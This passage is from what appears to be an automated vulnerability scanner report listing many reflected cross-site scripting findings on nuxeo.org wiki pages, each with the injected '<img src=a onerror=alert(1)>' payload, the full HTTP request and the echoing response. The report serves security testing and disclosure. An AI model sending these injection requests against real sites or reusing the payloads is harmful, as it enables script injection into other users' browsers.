...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Mainb6ecb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E3570ded39b1/NuxeoProdSetup?format=xar&amp;name=Mainb6ecb"><img src=a onerror=alert(1)>3570ded39b1.NuxeoProdSetup&amp;pages=Mainb6ecb">
...[SNIP]...

1.98. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c was submitted in the REST URL parameter 5. This input was echoed as 5f690<img src=a onerror=alert(1)>550971a196c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetup5f690<img%20src%3da%20onerror%3dalert(1)>550971a196c HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup5f690%3Cimg+src%3Da+onerror%3Dalert%281%29%3E550971a196c'>NuxeoProdSetup5f690<img src=a onerror=alert(1)>550971a196c</a>
...[SNIP]...

1.99. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/NuxeoProdSetup

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd was submitted in the REST URL parameter 5. This input was echoed as a30eb"><img src=a onerror=alert(1)>02bbce0edfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/NuxeoProdSetupa30eb"><img%20src%3da%20onerror%3dalert(1)>02bbce0edfd HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:44 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/NuxeoProdSetupa30eb%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E02bbce0edfd?format=xar&amp;name=Main.NuxeoProdSetupa30eb"><img src=a onerror=alert(1)>02bbce0edfd&amp;pages=Main.NuxeoProdSetupa30eb">
...[SNIP]...

1.100. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519 was submitted in the REST URL parameter 4. This input was echoed as 95666<img src=a onerror=alert(1)>e1bfc44a519 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main95666<img%20src%3da%20onerror%3dalert(1)>e1bfc44a519/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12936
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main95666%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee1bfc44a519/">Main95666<img src=a onerror=alert(1)>e1bfc44a519</a>
...[SNIP]...

1.101. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33 was submitted in the REST URL parameter 4. This input was echoed as ce6a9"><img src=a onerror=alert(1)>8481e731c33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maince6a9"><img%20src%3da%20onerror%3dalert(1)>8481e731c33/QuickStart53 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:18 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13002
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maince6a9%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E8481e731c33/QuickStart53?format=xar&amp;name=Maince6a9"><img src=a onerror=alert(1)>8481e731c33.QuickStart53&amp;pages=Maince6a9">
...[SNIP]...

1.102. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 was submitted in the REST URL parameter 5. This input was echoed as b1701<img src=a onerror=alert(1)>f3296b02031 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart53b1701<img%20src%3da%20onerror%3dalert(1)>f3296b02031 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12924
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53b1701%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef3296b02031'>QuickStart53b1701<img src=a onerror=alert(1)>f3296b02031</a>
...[SNIP]...

1.103. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/QuickStart53

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 was submitted in the REST URL parameter 5. This input was echoed as 7b69f"><img src=a onerror=alert(1)>e4df32fa359 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/QuickStart537b69f"><img%20src%3da%20onerror%3dalert(1)>e4df32fa359 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:52 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12986
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/QuickStart537b69f%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee4df32fa359?format=xar&amp;name=Main.QuickStart537b69f"><img src=a onerror=alert(1)>e4df32fa359&amp;pages=Main.QuickStart537b69f">
...[SNIP]...

1.104. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6 was submitted in the REST URL parameter 4. This input was echoed as 6f559<img src=a onerror=alert(1)>c8142c250a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6f559<img%20src%3da%20onerror%3dalert(1)>c8142c250a6/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12884
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main6f559%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ec8142c250a6/">Main6f559<img src=a onerror=alert(1)>c8142c250a6</a>
...[SNIP]...

1.105. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf was submitted in the REST URL parameter 4. This input was echoed as 44b1d"><img src=a onerror=alert(1)>62f3be97fdf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main44b1d"><img%20src%3da%20onerror%3dalert(1)>62f3be97fdf/RssFeeds HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:57 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main44b1d%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E62f3be97fdf/RssFeeds?format=xar&amp;name=Main44b1d"><img src=a onerror=alert(1)>62f3be97fdf.RssFeeds&amp;pages=Main44b1d">
...[SNIP]...

1.106. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed was submitted in the REST URL parameter 5. This input was echoed as 54448"><img src=a onerror=alert(1)>a9dc78f1bed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds54448"><img%20src%3da%20onerror%3dalert(1)>a9dc78f1bed HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12934
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/RssFeeds54448%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea9dc78f1bed?format=xar&amp;name=Main.RssFeeds54448"><img src=a onerror=alert(1)>a9dc78f1bed&amp;pages=Main.RssFeeds54448">
...[SNIP]...

1.107. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/RssFeeds

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f was submitted in the REST URL parameter 5. This input was echoed as 631e7<img src=a onerror=alert(1)>6c56452ca3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/RssFeeds631e7<img%20src%3da%20onerror%3dalert(1)>6c56452ca3f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12872
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds631e7%3Cimg+src%3Da+onerror%3Dalert%281%29%3E6c56452ca3f'>RssFeeds631e7<img src=a onerror=alert(1)>6c56452ca3f</a>
...[SNIP]...

1.108. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68 was submitted in the REST URL parameter 4. This input was echoed as 8c472"><img src=a onerror=alert(1)>24ed474cd68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main8c472"><img%20src%3da%20onerror%3dalert(1)>24ed474cd68/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main8c472%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E24ed474cd68/Tags?format=xar&amp;name=Main8c472"><img src=a onerror=alert(1)>24ed474cd68.Tags&amp;pages=Main8c472">
...[SNIP]...

1.109. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524 was submitted in the REST URL parameter 4. This input was echoed as 2faea<img src=a onerror=alert(1)>80fd4319524 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2faea<img%20src%3da%20onerror%3dalert(1)>80fd4319524/Tags HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:21 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2faea%3Cimg+src%3Da+onerror%3Dalert%281%29%3E80fd4319524/">Main2faea<img src=a onerror=alert(1)>80fd4319524</a>
...[SNIP]...

1.110. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/Tags

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 was submitted in the REST URL parameter 5. This input was echoed as f901e<img src=a onerror=alert(1)>63acc2cbc28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/Tagsf901e<img%20src%3da%20onerror%3dalert(1)>63acc2cbc28 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:59 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
